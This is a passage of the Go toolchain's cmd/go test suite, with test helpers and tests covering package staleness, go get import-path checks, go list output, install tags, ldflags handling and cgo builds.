func (tg *testgoData) grepStderrNot(match, msg string) {
tg.t.Helper()
tg.doGrepNot(match, &tg.stderr, "error", msg)
}
// grepBothNot looks for a regular expression in the test run's
// standard output or standard error and fails, logging msg, if it is
// found.
func (tg *testgoData) grepBothNot(match, msg string) {
tg.t.Helper()
if tg.doGrepMatch(match, &tg.stdout) || tg.doGrepMatch(match, &tg.stderr) {
tg.t.Log(msg)
tg.t.Fatalf("pattern %v found unexpectedly in standard output or standard error", match)
}
}
// doGrepCount counts the number of times a regexp is seen in a buffer.
func (tg *testgoData) doGrepCount(match string, b *bytes.Buffer) int {
tg.t.Helper()
if !tg.ran {
tg.t.Fatal("internal testsuite error: doGrepCount called before run")
}
re := regexp.MustCompile(match)
c := 0
for _, ln := range bytes.Split(b.Bytes(), []byte{'\n'}) {
if re.Match(ln) {
c++
}
}
return c
}
// grepCountBoth returns the number of times a regexp is seen in both
// standard output and standard error.
func (tg *testgoData) grepCountBoth(match string) int {
tg.t.Helper()
return tg.doGrepCount(match, &tg.stdout) + tg.doGrepCount(match, &tg.stderr)
}
// creatingTemp records that the test plans to create a temporary file
// or directory. If the file or directory exists already, it will be
// removed. When the test completes, the file or directory will be
// removed if it exists.
func (tg *testgoData) creatingTemp(path string) {
tg.t.Helper()
if filepath.IsAbs(path) && !strings.HasPrefix(path, tg.tempdir) {
tg.t.Fatalf("internal testsuite error: creatingTemp(%q) with absolute path not in temporary directory", path)
}
tg.must(robustio.RemoveAll(path))
tg.temps = append(tg.temps, path)
}
// makeTempdir makes a temporary directory for a run of testgo. If
// the temporary directory was already created, this does nothing.
func (tg *testgoData) makeTempdir() {
tg.t.Helper()
if tg.tempdir == "" {
var err error
tg.tempdir, err = os.MkdirTemp("", "gotest")
tg.must(err)
}
}
// tempFile adds a temporary file for a run of testgo.
func (tg *testgoData) tempFile(path, contents string) {
tg.t.Helper()
tg.makeTempdir()
tg.must(os.MkdirAll(filepath.Join(tg.tempdir, filepath.Dir(path)), 0755))
bytes := []byte(contents)
if strings.HasSuffix(path, ".go") {
formatted, err := format.Source(bytes)
if err == nil {
bytes = formatted
}
}
tg.must(os.WriteFile(filepath.Join(tg.tempdir, path), bytes, 0644))
}
// tempDir adds a temporary directory for a run of testgo.
func (tg *testgoData) tempDir(path string) {
tg.t.Helper()
tg.makeTempdir()
if err := os.MkdirAll(filepath.Join(tg.tempdir, path), 0755); err != nil && !os.IsExist(err) {
tg.t.Fatal(err)
}
}
// path returns the absolute pathname to file with the temporary
// directory.
func (tg *testgoData) path(name string) string {
tg.t.Helper()
if tg.tempdir == "" {
tg.t.Fatalf("internal testsuite error: path(%q) with no tempdir", name)
}
if name == "." {
return tg.tempdir
}
return filepath.Join(tg.tempdir, name)
}
// mustExist fails if path does not exist.
func (tg *testgoData) mustExist(path string) {
tg.t.Helper()
if _, err := os.Stat(path); err != nil {
if os.IsNotExist(err) {
tg.t.Fatalf("%s does not exist but should", path)
}
tg.t.Fatalf("%s stat failed: %v", path, err)
}
}
// mustNotExist fails if path exists.
func (tg *testgoData) mustNotExist(path string) {
tg.t.Helper()
if _, err := os.Stat(path); err == nil || !os.IsNotExist(err) {
tg.t.Fatalf("%s exists but should not (%v)", path, err)
}
}
// mustHaveContent succeeds if filePath is a path to a file,
// and that file is readable and not empty.
func (tg *testgoData) mustHaveContent(filePath string) {
tg.mustExist(filePath)
f, err := os.Stat(filePath)
if err != nil {
tg.t.Fatal(err)
}
if f.Size() == 0 {
tg.t.Fatalf("expected %s to have data, but is empty", filePath)
}
}
// wantExecutable fails with msg if path is not executable.
func (tg *testgoData) wantExecutable(path, msg string) {
tg.t.Helper()
if st, err := os.Stat(path); err != nil {
if !os.IsNotExist(err) {
tg.t.Log(err)
}
tg.t.Fatal(msg)
} else {
if runtime.GOOS != "windows" && st.Mode()&0111 == 0 {
tg.t.Fatalf("binary %s exists but is not executable", path)
}
}
}
// isStale reports whether pkg is stale, and why
func (tg *testgoData) isStale(pkg string) (bool, string) {
tg.t.Helper()
tg.run("list", "-f", "{{.Stale}}:{{.StaleReason}}", pkg)
v := strings.TrimSpace(tg.getStdout())
f := strings.SplitN(v, ":", 2)
if len(f) == 2 {
switch f[0] {
case "true":
return true, f[1]
case "false":
return false, f[1]
}
}
tg.t.Fatalf("unexpected output checking staleness of package %v: %v", pkg, v)
panic("unreachable")
}
// wantStale fails with msg if pkg is not stale.
func (tg *testgoData) wantStale(pkg, reason, msg string) {
tg.t.Helper()
stale, why := tg.isStale(pkg)
if !stale {
tg.t.Fatal(msg)
}
// We always accept the reason as being "not installed but
// available in build cache", because when that is the case go
// list doesn't try to sort out the underlying reason why the
// package is not installed.
if reason == "" && why != "" || !strings.Contains(why, reason) && !strings.Contains(why, "not installed but available in build cache") {
tg.t.Errorf("wrong reason for Stale=true: %q, want %q", why, reason)
}
}
// wantNotStale fails with msg if pkg is stale.
func (tg *testgoData) wantNotStale(pkg, reason, msg string) {
tg.t.Helper()
stale, why := tg.isStale(pkg)
if stale {
tg.t.Fatal(msg)
}
if reason == "" && why != "" || !strings.Contains(why, reason) {
tg.t.Errorf("wrong reason for Stale=false: %q, want %q", why, reason)
}
}
// If -testwork is specified, the test prints the name of the temp directory
// and does not remove it when done, so that a programmer can
// poke at the test file tree afterward.
var testWork = flag.Bool("testwork", false, "")
// cleanup cleans up a test that runs testgo.
func (tg *testgoData) cleanup() {
tg.t.Helper()
if *testWork {
tg.t.Logf("TESTWORK=%s\n", tg.path("."))
return
}
for _, path := range tg.temps {
tg.check(removeAll(path))
}
if tg.tempdir != "" {
tg.check(removeAll(tg.tempdir))
}
}
func removeAll(dir string) error {
// module cache has 0444 directories;
// make them writable in order to remove content.
filepath.WalkDir(dir, func(path string, info fs.DirEntry, err error) error {
// chmod not only directories, but also things that we couldn't even stat
// due to permission errors: they may also be unreadable directories.
if err != nil || info.IsDir() {
os.Chmod(path, 0777)
}
return nil
})
return robustio.RemoveAll(dir)
}
// failSSH puts an ssh executable in the PATH that always fails.
// This is to stub out uses of ssh by go get.
func (tg *testgoData) failSSH() {
tg.t.Helper()
wd, err := os.Getwd()
if err != nil {
tg.t.Fatal(err)
}
fail := filepath.Join(wd, "testdata/failssh")
tg.setenv("PATH", fmt.Sprintf("%v%c%v", fail, filepath.ListSeparator, os.Getenv("PATH")))
}
func TestNewReleaseRebuildsStalePackagesInGOPATH(t *testing.T) {
if testing.Short() {
t.Skip("skipping lengthy test in short mode")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
// Copy the runtime packages into a temporary GOROOT
// so that we can change files.
for _, copydir := range []string{
"src/runtime",
"src/internal/abi",
"src/internal/bytealg",
"src/internal/cpu",
"src/internal/goarch",
"src/internal/goexperiment",
"src/internal/goos",
"src/math/bits",
"src/unsafe",
filepath.Join("pkg", runtime.GOOS+"_"+runtime.GOARCH),
filepath.Join("pkg/tool", runtime.GOOS+"_"+runtime.GOARCH),
"pkg/include",
} {
srcdir := filepath.Join(testGOROOT, copydir)
tg.tempDir(filepath.Join("goroot", copydir))
err := filepath.WalkDir(srcdir,
func(path string, info fs.DirEntry, err error) error {
if err != nil {
return err
}
if info.IsDir() {
return nil
}
srcrel, err := filepath.Rel(srcdir, path)
if err != nil {
return err
}
dest := filepath.Join("goroot", copydir, srcrel)
data, err := os.ReadFile(path)
if err != nil {
return err
}
tg.tempFile(dest, string(data))
if strings.Contains(copydir, filepath.Join("pkg", "tool")) {
os.Chmod(tg.path(dest), 0777)
}
return nil
})
if err != nil {
t.Fatal(err)
}
}
tg.setenv("GOROOT", tg.path("goroot"))
addVar := func(name string, idx int) (restore func()) {
data, err := os.ReadFile(name)
if err != nil {
t.Fatal(err)
}
old := data
data = append(data, fmt.Sprintf("var DummyUnusedVar%d bool\n", idx)...)
if err := os.WriteFile(name, append(data, '\n'), 0666); err != nil {
t.Fatal(err)
}
tg.sleep()
return func() {
if err := os.WriteFile(name, old, 0666); err != nil {
t.Fatal(err)
}
}
}
// Every main package depends on the "runtime".
tg.tempFile("d1/src/p1/p1.go", `package main; func main(){}`)
tg.setenv("GOPATH", tg.path("d1"))
// Pass -i flag to rebuild everything outdated.
tg.run("install", "-i", "p1")
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale, incorrectly, before any changes")
// Changing mtime of runtime/internal/sys/sys.go
// should have no effect: only the content matters.
// In fact this should be true even outside a release branch.
sys := tg.path("goroot/src/runtime/internal/sys/sys.go")
tg.sleep()
restore := addVar(sys, 0)
restore()
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale, incorrectly, after updating mtime of runtime/internal/sys/sys.go")
// But changing content of any file should have an effect.
// Previously zversion.go was the only one that mattered;
// now they all matter, so keep using sys.go.
restore = addVar(sys, 1)
defer restore()
tg.wantStale("p1", "stale dependency: runtime/internal/sys", "./testgo list claims p1 is NOT stale, incorrectly, after changing sys.go")
restore()
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale, incorrectly, after changing back to old release")
addVar(sys, 2)
tg.wantStale("p1", "stale dependency: runtime", "./testgo list claims p1 is NOT stale, incorrectly, after changing sys.go again")
tg.run("install", "-i", "p1")
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale after building with new release")
// Restore to "old" release.
restore()
tg.wantStale("p1", "stale dependency: runtime/internal/sys", "./testgo list claims p1 is NOT stale, incorrectly, after restoring sys.go")
tg.run("install", "-i", "p1")
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale after building with old release")
}
// cmd/go: custom import path checking should not apply to Go packages without import comment.
func TestIssue10952(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
const importPath = "github.com/zombiezen/go-get-issue-10952"
tg.run("get", "-d", "-u", importPath)
repoDir := tg.path("src/" + importPath)
tg.runGit(repoDir, "remote", "set-url", "origin", "https://"+importPath+".git")
tg.run("get", "-d", "-u", importPath)
}
func TestIssue16471(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
tg.must(os.MkdirAll(tg.path("src/rsc.io/go-get-issue-10952"), 0755))
tg.runGit(tg.path("src/rsc.io"), "clone", "https://github.com/zombiezen/go-get-issue-10952")
tg.runFail("get", "-u", "rsc.io/go-get-issue-10952")
tg.grepStderr("rsc.io/go-get-issue-10952 is a custom import path for https://github.com/rsc/go-get-issue-10952, but .* is checked out from https://github.com/zombiezen/go-get-issue-10952", "did not detect updated import path")
}
// Test git clone URL that uses SCP-like syntax and custom import path checking.
func TestIssue11457(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
const importPath = "rsc.io/go-get-issue-11457"
tg.run("get", "-d", "-u", importPath)
repoDir := tg.path("src/" + importPath)
tg.runGit(repoDir, "remote", "set-url", "origin", "[email protected]:rsc/go-get-issue-11457")
// At this time, custom import path checking compares remotes verbatim (rather than
// just the host and path, skipping scheme and user), so we expect go get -u to fail.
// However, the goal of this test is to verify that gitRemoteRepo correctly parsed
// the SCP-like syntax, and we expect it to appear in the error message.
tg.runFail("get", "-d", "-u", importPath)
want := " is checked out from ssh://[email protected]/rsc/go-get-issue-11457"
if !strings.HasSuffix(strings.TrimSpace(tg.getStderr()), want) {
t.Error("expected clone URL to appear in stderr")
}
}
func TestGetGitDefaultBranch(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
// This repo has two branches, master and another-branch.
// The another-branch is the default that you get from 'git clone'.
// The go get command variants should not override this.
const importPath = "github.com/rsc/go-get-default-branch"
tg.run("get", "-d", importPath)
repoDir := tg.path("src/" + importPath)
tg.runGit(repoDir, "branch", "--contains", "HEAD")
tg.grepStdout(`\* another-branch`, "not on correct default branch")
tg.run("get", "-d", "-u", importPath)
tg.runGit(repoDir, "branch", "--contains", "HEAD")
tg.grepStdout(`\* another-branch`, "not on correct default branch")
}
// Security issue. Don't disable. See golang.org/issue/22125.
func TestAccidentalGitCheckout(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
testenv.MustHaveExecPath(t, "svn")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("get", "-u", "vcs-test.golang.org/go/test1-svn-git")
tg.grepStderr("src[\\\\/]vcs-test.* uses git, but parent .*src[\\\\/]vcs-test.* uses svn", "get did not fail for right reason")
if _, err := os.Stat(tg.path("SrC")); err == nil {
// This case only triggers on a case-insensitive file system.
tg.runFail("get", "-u", "vcs-test.golang.org/go/test2-svn-git/test2main")
tg.grepStderr("src[\\\\/]vcs-test.* uses git, but parent .*src[\\\\/]vcs-test.* uses svn", "get did not fail for right reason")
}
}
func TestPackageMainTestCompilerFlags(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.path("."))
tg.tempFile("src/p1/p1.go", "package main\n")
tg.tempFile("src/p1/p1_test.go", "package main\nimport \"testing\"\nfunc Test(t *testing.T){}\n")
tg.run("test", "-c", "-n", "p1")
tg.grepBothNot(`([\\/]compile|gccgo).* (-p main|-fgo-pkgpath=main).*p1\.go`, "should not have run compile -p main p1.go")
tg.grepStderr(`([\\/]compile|gccgo).* (-p p1|-fgo-pkgpath=p1).*p1\.go`, "should have run compile -p p1 p1.go")
}
// Issue 4104.
func TestGoTestWithPackageListedMultipleTimes(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("test", "errors", "errors", "errors", "errors", "errors")
if strings.Contains(strings.TrimSpace(tg.getStdout()), "\n") {
t.Error("go test errors errors errors errors errors tested the same package multiple times")
}
}
func TestGoListHasAConsistentOrder(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("list", "std")
first := tg.getStdout()
tg.run("list", "std")
if first != tg.getStdout() {
t.Error("go list std ordering is inconsistent")
}
}
func TestGoListStdDoesNotIncludeCommands(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("list", "std")
tg.grepStdoutNot("cmd/", "go list std shows commands")
}
func TestGoListCmdOnlyShowsCommands(t *testing.T) {
skipIfGccgo(t, "gccgo does not have GOROOT")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("list", "cmd")
out := strings.TrimSpace(tg.getStdout())
for _, line := range strings.Split(out, "\n") {
if !strings.Contains(line, "cmd/") {
t.Error("go list cmd shows non-commands")
break
}
}
}
func TestGoListDeps(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src/p1/p2/p3/p4")
tg.setenv("GOPATH", tg.path("."))
tg.tempFile("src/p1/p.go", "package p1\nimport _ \"p1/p2\"\n")
tg.tempFile("src/p1/p2/p.go", "package p2\nimport _ \"p1/p2/p3\"\n")
tg.tempFile("src/p1/p2/p3/p.go", "package p3\nimport _ \"p1/p2/p3/p4\"\n")
tg.tempFile("src/p1/p2/p3/p4/p.go", "package p4\n")
tg.run("list", "-f", "{{.Deps}}", "p1")
tg.grepStdout("p1/p2/p3/p4", "Deps(p1) does not mention p4")
tg.run("list", "-deps", "p1")
tg.grepStdout("p1/p2/p3/p4", "-deps p1 does not mention p4")
if runtime.Compiler != "gccgo" {
// Check the list is in dependency order.
tg.run("list", "-deps", "math")
want := "internal/cpu\nunsafe\nmath/bits\nmath\n"
out := tg.stdout.String()
if !strings.Contains(out, "internal/cpu") {
// Some systems don't use internal/cpu.
want = "unsafe\nmath/bits\nmath\n"
}
if tg.stdout.String() != want {
t.Fatalf("list -deps math: wrong order\nhave %q\nwant %q", tg.stdout.String(), want)
}
}
}
func TestGoListTest(t *testing.T) {
skipIfGccgo(t, "gccgo does not have standard packages")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.tempdir)
tg.run("list", "-test", "-deps", "sort")
tg.grepStdout(`^sort.test$`, "missing test main")
tg.grepStdout(`^sort$`, "missing real sort")
tg.grepStdout(`^sort \[sort.test\]$`, "missing test copy of sort")
tg.grepStdout(`^testing \[sort.test\]$`, "missing test copy of testing")
tg.grepStdoutNot(`^testing$`, "unexpected real copy of testing")
tg.run("list", "-test", "sort")
tg.grepStdout(`^sort.test$`, "missing test main")
tg.grepStdout(`^sort$`, "missing real sort")
tg.grepStdout(`^sort \[sort.test\]$`, "unexpected test copy of sort")
tg.grepStdoutNot(`^testing \[sort.test\]$`, "unexpected test copy of testing")
tg.grepStdoutNot(`^testing$`, "unexpected real copy of testing")
tg.run("list", "-test", "cmd/dist", "cmd/doc")
tg.grepStdout(`^cmd/dist$`, "missing cmd/dist")
tg.grepStdout(`^cmd/doc$`, "missing cmd/doc")
tg.grepStdout(`^cmd/doc\.test$`, "missing cmd/doc test")
tg.grepStdoutNot(`^cmd/dist\.test$`, "unexpected cmd/dist test")
tg.grepStdoutNot(`^testing`, "unexpected testing")
tg.run("list", "-test", "runtime/cgo")
tg.grepStdout(`^runtime/cgo$`, "missing runtime/cgo")
tg.run("list", "-deps", "-f", "{{if .DepOnly}}{{.ImportPath}}{{end}}", "sort")
tg.grepStdout(`^internal/reflectlite$`, "missing internal/reflectlite")
tg.grepStdoutNot(`^sort`, "unexpected sort")
}
func TestGoListCompiledCgo(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.tempdir)
tg.run("list", "-f", `{{join .CgoFiles "\n"}}`, "net")
if tg.stdout.String() == "" {
t.Skip("net does not use cgo")
}
if strings.Contains(tg.stdout.String(), tg.tempdir) {
t.Fatalf(".CgoFiles unexpectedly mentioned cache %s", tg.tempdir)
}
tg.run("list", "-compiled", "-f", `{{.Dir}}{{"\n"}}{{join .CompiledGoFiles "\n"}}`, "net")
if !strings.Contains(tg.stdout.String(), tg.tempdir) {
t.Fatalf(".CompiledGoFiles with -compiled did not mention cache %s", tg.tempdir)
}
dir := ""
for _, file := range strings.Split(tg.stdout.String(), "\n") {
if file == "" {
continue
}
if dir == "" {
dir = file
continue
}
if !strings.Contains(file, "/") && !strings.Contains(file, `\`) {
file = filepath.Join(dir, file)
}
if _, err := os.Stat(file); err != nil {
t.Fatalf("cannot find .CompiledGoFiles result %s: %v", file, err)
}
}
}
func TestGoListExport(t *testing.T) {
skipIfGccgo(t, "gccgo does not have standard packages")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.tempdir)
tg.run("list", "-f", "{{.Export}}", "strings")
if tg.stdout.String() != "" {
t.Fatalf(".Export without -export unexpectedly set")
}
tg.run("list", "-export", "-f", "{{.Export}}", "strings")
file := strings.TrimSpace(tg.stdout.String())
if file == "" {
t.Fatalf(".Export with -export was empty")
}
if _, err := os.Stat(file); err != nil {
t.Fatalf("cannot find .Export result %s: %v", file, err)
}
tg.run("list", "-export", "-f", "{{.BuildID}}", "strings")
buildID := strings.TrimSpace(tg.stdout.String())
if buildID == "" {
t.Fatalf(".BuildID with -export was empty")
}
tg.run("tool", "buildid", file)
toolBuildID := strings.TrimSpace(tg.stdout.String())
if buildID != toolBuildID {
t.Fatalf(".BuildID with -export %q disagrees with 'go tool buildid' %q", buildID, toolBuildID)
}
}
// Issue 4096. Validate the output of unsuccessful go install foo/quxx.
func TestUnsuccessfulGoInstallShouldMentionMissingPackage(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(`cannot find package "foo/quxx" in any of`) != 1 {
t.Error(`go install foo/quxx expected error: .*cannot find package "foo/quxx" in any of`)
}
}
func TestGOROOTSearchFailureReporting(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(regexp.QuoteMeta(filepath.Join("foo", "quxx"))+` \(from \$GOROOT\)$`) != 1 {
t.Error(`go install foo/quxx expected error: .*foo/quxx (from $GOROOT)`)
}
}
func TestMultipleGOPATHEntriesReportedSeparately(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
sep := string(filepath.ListSeparator)
tg.setenv("GOPATH", filepath.Join(tg.pwd(), "testdata", "a")+sep+filepath.Join(tg.pwd(), "testdata", "b"))
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(`testdata[/\\].[/\\]src[/\\]foo[/\\]quxx`) != 2 {
t.Error(`go install foo/quxx expected error: .*testdata/a/src/foo/quxx (from $GOPATH)\n.*testdata/b/src/foo/quxx`)
}
}
// Test (from $GOPATH) annotation is reported for the first GOPATH entry,
func TestMentionGOPATHInFirstGOPATHEntry(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
sep := string(filepath.ListSeparator)
tg.setenv("GOPATH", filepath.Join(tg.pwd(), "testdata", "a")+sep+filepath.Join(tg.pwd(), "testdata", "b"))
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(regexp.QuoteMeta(filepath.Join("testdata", "a", "src", "foo", "quxx"))+` \(from \$GOPATH\)$`) != 1 {
t.Error(`go install foo/quxx expected error: .*testdata/a/src/foo/quxx (from $GOPATH)`)
}
}
// but not on the second.
func TestMentionGOPATHNotOnSecondEntry(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
sep := string(filepath.ListSeparator)
tg.setenv("GOPATH", filepath.Join(tg.pwd(), "testdata", "a")+sep+filepath.Join(tg.pwd(), "testdata", "b"))
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(regexp.QuoteMeta(filepath.Join("testdata", "b", "src", "foo", "quxx"))+`$`) != 1 {
t.Error(`go install foo/quxx expected error: .*testdata/b/src/foo/quxx`)
}
}
func homeEnvName() string {
switch runtime.GOOS {
case "windows":
return "USERPROFILE"
case "plan9":
return "home"
default:
return "HOME"
}
}
func tempEnvName() string {
switch runtime.GOOS {
case "windows":
return "TMP"
case "plan9":
return "TMPDIR" // actually plan 9 doesn't have one at all but this is fine
default:
return "TMPDIR"
}
}
func TestDefaultGOPATH(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("home/go")
tg.setenv(homeEnvName(), tg.path("home"))
tg.run("env", "GOPATH")
tg.grepStdout(regexp.QuoteMeta(tg.path("home/go")), "want GOPATH=$HOME/go")
tg.setenv("GOROOT", tg.path("home/go"))
tg.run("env", "GOPATH")
tg.grepStdoutNot(".", "want unset GOPATH because GOROOT=$HOME/go")
tg.setenv("GOROOT", tg.path("home/go")+"/")
tg.run("env", "GOPATH")
tg.grepStdoutNot(".", "want unset GOPATH because GOROOT=$HOME/go/")
}
func TestDefaultGOPATHGet(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.setenv("GOPATH", "")
tg.tempDir("home")
tg.setenv(homeEnvName(), tg.path("home"))
// warn for creating directory
tg.run("get", "-v", "github.com/golang/example/hello")
tg.grepStderr("created GOPATH="+regexp.QuoteMeta(tg.path("home/go"))+"; see 'go help gopath'", "did not create GOPATH")
// no warning if directory already exists
tg.must(robustio.RemoveAll(tg.path("home/go")))
tg.tempDir("home/go")
tg.run("get", "github.com/golang/example/hello")
tg.grepStderrNot(".", "expected no output on standard error")
// error if $HOME/go is a file
tg.must(robustio.RemoveAll(tg.path("home/go")))
tg.tempFile("home/go", "")
tg.runFail("get", "github.com/golang/example/hello")
tg.grepStderr(`mkdir .*[/\\]go: .*(not a directory|cannot find the path)`, "expected error because $HOME/go is a file")
}
func TestDefaultGOPATHPrintedSearchList(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.setenv("GOPATH", "")
tg.tempDir("home")
tg.setenv(homeEnvName(), tg.path("home"))
tg.runFail("install", "github.com/golang/example/hello")
tg.grepStderr(regexp.QuoteMeta(tg.path("home/go/src/github.com/golang/example/hello"))+`.*from \$GOPATH`, "expected default GOPATH")
}
func TestLdflagsArgumentsWithSpacesIssue3941(t *testing.T) {
skipIfGccgo(t, "gccgo does not support -ldflags -X")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("main.go", `package main
var extern string
func main() {
println(extern)
}`)
tg.run("run", "-ldflags", `-X "main.extern=hello world"`, tg.path("main.go"))
tg.grepStderr("^hello world", `ldflags -X "main.extern=hello world"' failed`)
}
func TestLdFlagsLongArgumentsIssue42295(t *testing.T) {
// Test the extremely long command line arguments that contain '\n' characters
// get encoded and passed correctly.
skipIfGccgo(t, "gccgo does not support -ldflags -X")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("main.go", `package main
var extern string
func main() {
print(extern)
}`)
testStr := "test test test test test \n\\ "
var buf bytes.Buffer
for buf.Len() < sys.ExecArgLengthLimit+1 {
buf.WriteString(testStr)
}
tg.run("run", "-buildinfo=false", "-ldflags", fmt.Sprintf(`-X "main.extern=%s"`, buf.String()), tg.path("main.go"))
if tg.stderr.String() != buf.String() {
t.Errorf("strings differ")
}
}
func TestGoTestDashCDashOControlsBinaryLocation(t *testing.T) {
skipIfGccgo(t, "gccgo has no standard packages")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.run("test", "-c", "-o", tg.path("myerrors.test"+exeSuffix), "errors")
tg.wantExecutable(tg.path("myerrors.test"+exeSuffix), "go test -c -o myerrors.test did not create myerrors.test")
}
func TestGoTestDashOWritesBinary(t *testing.T) {
skipIfGccgo(t, "gccgo has no standard packages")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.run("test", "-o", tg.path("myerrors.test"+exeSuffix), "errors")
tg.wantExecutable(tg.path("myerrors.test"+exeSuffix), "go test -o myerrors.test did not create myerrors.test")
}
func TestGoTestDashIDashOWritesBinary(t *testing.T) {
skipIfGccgo(t, "gccgo has no standard packages")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
// don't let test -i overwrite runtime
tg.wantNotStale("runtime", "", "must be non-stale before test -i")
tg.run("test", "-v", "-i", "-o", tg.path("myerrors.test"+exeSuffix), "errors")
tg.grepBothNot("PASS|FAIL", "test should not have run")
tg.wantExecutable(tg.path("myerrors.test"+exeSuffix), "go test -o myerrors.test did not create myerrors.test")
}
// Issue 4515.
func TestInstallWithTags(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("bin")
tg.tempFile("src/example/a/main.go", `package main
func main() {}`)
tg.tempFile("src/example/b/main.go", `// +build mytag
package main
func main() {}`)
tg.setenv("GOPATH", tg.path("."))
tg.run("install", "-tags", "mytag", "example/a", "example/b")
tg.wantExecutable(tg.path("bin/a"+exeSuffix), "go install example/a example/b did not install binaries")
tg.wantExecutable(tg.path("bin/b"+exeSuffix), "go install example/a example/b did not install binaries")
tg.must(os.Remove(tg.path("bin/a" + exeSuffix)))
tg.must(os.Remove(tg.path("bin/b" + exeSuffix)))
tg.run("install", "-tags", "mytag", "example/...")
tg.wantExecutable(tg.path("bin/a"+exeSuffix), "go install example/... did not install binaries")
tg.wantExecutable(tg.path("bin/b"+exeSuffix), "go install example/... did not install binaries")
tg.run("list", "-tags", "mytag", "example/b...")
if strings.TrimSpace(tg.getStdout()) != "example/b" {
t.Error("go list example/b did not find example/b")
}
}
// Issue 17451, 17662.
func TestSymlinkWarning(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.path("."))
tg.tempDir("src/example/xx")
tg.tempDir("yy/zz")
tg.tempFile("yy/zz/zz.go", "package zz\n")
if err := os.Symlink(tg.path("yy"), tg.path("src/example/xx/yy")); err != nil {
t.Skipf("symlink failed: %v", err)
}
tg.run("list", "example/xx/z...")
tg.grepStdoutNot(".", "list should not have matched anything")
tg.grepStderr("matched no packages", "list should have reported that pattern matched no packages")
tg.grepStderrNot("symlink", "list should not have reported symlink")
tg.run("list", "example/xx/...")
tg.grepStdoutNot(".", "list should not have matched anything")
tg.grepStderr("matched no packages", "list should have reported that pattern matched no packages")
tg.grepStderr("ignoring symlink", "list should have reported symlink")
}
func TestCgoShowsFullPathNames(t *testing.T) {
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/x/y/dirname/foo.go", `
package foo
import "C"
func f() {`)
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "x/y/dirname")
tg.grepBoth("x/y/dirname", "error did not use full path")
}
func TestCgoHandlesWlORIGIN(t *testing.T) {
tooSlow(t)
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/origin/origin.go", `package origin
// #cgo !darwin LDFLAGS: -Wl,-rpath,$ORIGIN
// void f(void) {}
import "C"
func f() { C.f() }`)
tg.setenv("GOPATH", tg.path("."))
tg.run("build", "origin")
}
func TestCgoPkgConfig(t *testing.T) {
tooSlow(t)
if !canCgo {
